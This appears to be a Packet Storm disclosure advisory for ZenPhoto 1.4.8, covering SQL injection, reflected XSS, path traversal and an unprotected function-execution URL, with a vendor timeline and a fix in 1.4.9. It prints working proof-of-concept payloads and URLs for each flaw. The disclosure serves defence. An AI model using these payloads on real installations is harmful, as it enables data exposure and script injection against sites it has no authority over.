exploit the possibilities

ZenPhoto 1.4.8 XSS / SQL Injection / Traversal

ZenPhoto 1.4.8 XSS / SQL Injection / Traversal
Posted Jul 13, 2015
Authored by Tim Coen

ZenPhoto version 1.4.8 suffers from cross site scripting, remote SQL injection, and path traversal vulnerabilities.

tags | exploit, remote, vulnerability, xss, sql injection, file inclusion
MD5 | a152c97ff53b04368572681b68d6275a

ZenPhoto 1.4.8 XSS / SQL Injection / Traversal

Change Mirror Download
Vulnerability: SQL Injection, Reflected XSS, Path Traversal
Affected Software: ZenPhoto (http://www.zenphoto.org/)
Affected Version: 1.4.8 (probably also prior versions)
Patched Version: 1.4.9
Risk: Medium
Vendor Contacted: 2015-05-18
Vendor Fix: 2015-07-09
Public Disclosure: 2015-07-10

SQL Injection
=============

There are multiple second order error based SQL injections into the
ORDER BY keyword in the admin area.

- visit zp-core/admin-options.php?saved&tab=gallery
alternatively visit zp-core/admin-options.php?saved&tab=image
- Set "Sort gallery by" to "Custom"
- set custom fields to "id,extractvalue(0x0a,concat(0x0a,(select
version())))%23"
- visit zp-core/admin-upload.php?page=upload&tab=http&type=images
- alternatively, visiting either of these will also trigger the injection:
/
zp-core/admin-edit.php
zp-core/admin-users.php?page=users
zp-core/admin-themes.php

The result is only directly displayed if the server is configured to
report errors, but it can also be seen in the logfile located at
zp-core/admin-logs.php?page=logs

XSS 1
=====

http://localhost/zenphoto-zenphoto-1.4.8/zp-core/admin-upload.php?error=%26lt%3Bscript%26gt%3Balert(1)%26lt%3B%2Fscript%26gt%3B
http://localhost/zenphoto-zenphoto-1.4.8/zp-core/utilities/backup_restore.php?compression=%26lt%3Bscript%26gt%3Balert%281%29%26lt%3B%2Fscript%26gt%3B

The payload must first be HTML entity-encoded, and then URL encoded.

XSS 2
=====


http://localhost/zenphoto-security-fixes/zp-core/admin.php?action=external&error="
onmouseover="alert('xsstest')" foo="bar&msg=hover over me!

Directory Traversal
===================

For an admin, it is possible to view and edit any PHP or inc files, not
just the ones inside the theme directory.

http://localhost/zenphoto-zenphoto-1.4.8/zp-core/admin-themes-editor.php?theme=../../../../../var/www&file=secret.php


Execute Function
================

An admin user can execute any function they want via this URL (there is
no CSRF protection for it):

localhost/zenphoto-security-fixes/zp-core/admin.php?action=phpinfo

This gives up some control over the control flow of the site, which
might cause problems, especially considering the missing of CSRF protection.

Source
======

http://software-talk.org/blog/2015/07/second-order-sql-injection-reflected-xss-path-traversal-function-execution-vulnerability-zenphoto/
Login or Register to add favorites

File Archive:

September 2020

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    20 Files
  • 2
    Sep 2nd
    15 Files
  • 3
    Sep 3rd
    15 Files
  • 4
    Sep 4th
    4 Files
  • 5
    Sep 5th
    1 Files
  • 6
    Sep 6th
    1 Files
  • 7
    Sep 7th
    15 Files
  • 8
    Sep 8th
    27 Files
  • 9
    Sep 9th
    7 Files
  • 10
    Sep 10th
    16 Files
  • 11
    Sep 11th
    9 Files
  • 12
    Sep 12th
    0 Files
  • 13
    Sep 13th
    0 Files
  • 14
    Sep 14th
    25 Files
  • 15
    Sep 15th
    15 Files
  • 16
    Sep 16th
    15 Files
  • 17
    Sep 17th
    15 Files
  • 18
    Sep 18th
    12 Files
  • 19
    Sep 19th
    1 Files
  • 20
    Sep 20th
    1 Files
  • 21
    Sep 21st
    15 Files
  • 22
    Sep 22nd
    21 Files
  • 23
    Sep 23rd
    8 Files
  • 24
    Sep 24th
    15 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close